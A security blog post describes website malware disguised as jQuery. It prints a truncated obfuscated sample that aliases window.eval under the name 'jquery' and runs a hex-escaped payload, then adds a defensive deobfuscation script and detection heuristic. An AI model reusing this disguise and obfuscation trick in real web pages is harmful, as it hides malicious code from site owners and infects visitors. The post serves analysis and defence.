Malware Posing as jQuery

    Web-based malware is the new bane of the Internet. Malware developers have focused on using websites to distribute millions of copies of viruses, Trojans and other malicious programs. This modern modus operandi relies on the fact that many websites have weak security and can be compromised easily. In this article we want to raise awareness of how malware developers hide their malicious code to evade detection by website administrators and by security software.

    The Phenomenon
    The number of websites getting hacked grows by the day. More than 6,600 new websites are hacked every single day; they consequently become distributors of malware and are subsequently blacklisted. This results in lost business and customer trust, not to mention that these compromised websites can become links in a chain of information theft.

    Attack patterns change hourly. Consider, for example, that on any given day 200,000 samples of web-based malware are identified on websites across the Internet. Firewalls, Web Application Firewalls (WAFs) and other security software make it harder for hackers to penetrate a website's defences, but given the sheer volume and number of variants of malware, it is impossible for security vendors to deliver signatures in real time.

    Malware Posing as jQuery
    One way hackers fly under the radar, while causing immense damage to visitors of compromised websites, is to make their malicious code look like trusted code developed by a reputable organization. We present an example below.

    var jquery = eval('wjign&dxogwj.;e&v&a;l;'.replace(/[g&;jx]/g, ''));
    jquery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x75\x56\x47\x34\x28\x66\x4d\x36\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x74\x44\x36\x42\x48\x28\x62\x62\x52\x35\x78\x29\x7b\x76\x61\x72\x20\x67\x33\x67\x39\x3d\x30\x3b\x76\x61\x72\x20\x66\x47\x50\x59\x44\x41\x53\x3d\x62\x62\x52\x35\x78\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x69\x4e\x49\x4a\x6b\x76\x6b\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x69\x4e\x49\x4a\x6b\x76\x6b\x3c\x66\x47\x50\x59\x44\x41\x53\x29\x7b\x67\x33\x67\x39\x2b\x3d\x70\x4b\x76\x35\x32\x28\x62\x62\x52\x35\x78\x2c\x69\x4e\x49\x4a\x6b\x76\x6b\x29\x2a\x66\x47\x50\x59\x44\x41\x53\x3b\x69\x4e\x49\x4a\x6b\x76\x6b\x2b\x2b\x3b\x7d\x72\x65\x74\x75\x72\x6e\x20\x28\x67\x33\x67\x39\x2b\x27\x27\x29\x3b\x7d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x70\x4b\x76\x35\x32\x28\x67\x51\x52\x2c\x7a\x72\x77\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x67\x51\x52\x2e\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74\x28\x7a\x72\x77\x29\x3b\x7d\x20\x20\x20\x74\x72\x79\x20\x7b\x76\x61\x72\x20\x73\x44\x30\x76\x6c\x78\x3d\x65\x76

    This particular code was mined from a page on:

    http://www.acc4arab.com/newsite/[scrubbed].shtml

    This is just one of many examples of malware we see on a daily basis pretending to be a legitimate piece of software. In this case, the code uses a simple naming trick: the entire payload of the malware is assigned to an innocuous-sounding variable whose name matches that of a well-known JavaScript framework widely used by developers: jQuery. In the past, we have seen hackers targeting jQuery, but in a slightly different manner. An interesting related post: Down the rabbit hole.
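    The two obfuscation layers in the sample above can be undone statically, without ever executing the code. The following is an added example written for this post (not code from the original article or from any scanner product); it assumes nothing beyond the snippet shown and embeds a constructed copy of its first line together with the opening bytes of its hex payload, since the post's own string is truncated.

```javascript
// Added example (not from the original post): static deobfuscation and a
// detection heuristic for the sample above. Nothing here calls eval; each
// layer is undone with plain string operations so an analyst sees what the
// code would resolve to without running it.

// Layer 1: the replace() trick. The sample deletes the characters in the
// class [g&;jx] from a junk string and the real identifier is what remains.
function resolveReplaceTrick(junk, dropClass) {
  return junk.replace(new RegExp('[' + dropClass + ']', 'g'), '');
}

// Layer 2: a string made entirely of \xNN escapes. Decode them ourselves
// rather than letting the JavaScript parser (or eval) do it.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g,
    (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

// Rewrite a source snippet with both layers undone: eval('junk'.replace(...))
// becomes the identifier it hides, and hex-escaped strings become readable.
function staticReveal(source) {
  const evalReplace = /eval\('([^']*)'\.replace\(\/\[([^\]]*)\]\/g,\s*''\)\)/g;
  const step1 = source.replace(evalReplace, (_, junk, cls) => resolveReplaceTrick(junk, cls));
  return decodeHexEscapes(step1);
}

// Scanner heuristic for the naming trick the post describes: a variable named
// after a trusted library is assigned the result of eval(...), then called
// with a string consisting of nothing but hex escapes.
const TRUSTED_NAMES = ['jquery', 'jQuery', 'angular', 'prototype'];
function flagsLibraryAlias(source) {
  const assign = /var\s+(\w+)\s*=\s*eval\(/.exec(source);
  if (!assign || !TRUSTED_NAMES.includes(assign[1])) return false;
  const hexCall = new RegExp('\\b' + assign[1] + "\\('(?:\\\\x[0-9a-fA-F]{2})+'\\)");
  return hexCall.test(source);
}

// Constructed sample: the first line of the post's snippet plus the opening
// bytes of its hex payload (the post's own string is truncated).
const SAMPLE =
  "var jquery = eval('wjign&dxogwj.;e&v&a;l;'.replace(/[g&;jx]/g, ''));\n" +
  "jquery('\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x75\\x56\\x47\\x34\\x28\\x66\\x4d\\x36\\x29');";

console.log(staticReveal(SAMPLE));      // "var jquery = window.eval;" then "jquery('function uVG4(fM6)');"
console.log(flagsLibraryAlias(SAMPLE)); // true
```

    The revealed form shows why the name matters to a reviewer: `jquery` is simply an alias for `window.eval`, so the "framework call" on the second line is the payload being executed.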

    Protect Your Website
    Website owners should take advantage of new, emerging website health monitoring solutions. This kind of technology scans websites continuously, is completely SaaS based and uses advanced artificial intelligence techniques to catch never-before-seen malware. This is a significant break from the way most traditional anti-virus software works: simply scanning for signatures is not enough to detect the thousands of new malware variants. Consider, for example, that current anti-virus engines cannot detect web-based malware effectively.

    Use of new scanning technology such as on-demand web scanning can help website owners protect their reputation and maintain business continuity.

    Till next time…